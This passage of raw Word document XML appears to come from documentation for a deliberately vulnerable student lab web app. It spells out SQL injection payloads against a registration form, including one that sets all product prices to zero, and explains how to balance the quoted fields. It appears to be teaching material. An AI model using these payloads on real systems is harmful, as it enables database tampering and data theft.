          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>date_created</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>register</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidRPr="009B40A5">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
            <w:color w:val="0563C1" w:themeColor="hyperlink"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>email='bob@projex.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ORDER</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>BY</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>DESC</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A09F6A" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>N.B.: This is injected into a query that begins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37105F94" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="330" w:lineRule="exact"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>register</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2F81D7" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>See figures 3, 4 &amp; 5 in outcome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B94DD1C" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Finally, the Register form is highly exploitable and allows students to experiment with a range of possibilities for database manipulation. For example, to set the prices of all products to zero, the user could place the following in a field of the registration form:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F36A5D" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="330" w:lineRule="exact"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>addproduct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>SET</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>price</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="B5CEA8"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4460E8" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33466625" w14:textId="313EA952" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Note that the number of quotation marks needed must correspond to the place in the field. Because the name field is the first field, the query must be escaped by terminating the right</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>number of strings (11 total) or an error will occur and the query will fail. This necessitates students experimenting to find the correct number of fields in order to send a syntactically correct SQL injection. See figures 6 &amp; 7 in outcome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC96652" w14:textId="4BF288ED" w:rsidR="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Finally, in order to prevent students getting stuck with the database in an invalid state, a rescue command is provided. Simply navigate to `/admin/restoredb` and the database will be reset to a healthy state, ready for more exploitation attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5E6FCE" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F41AA9" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
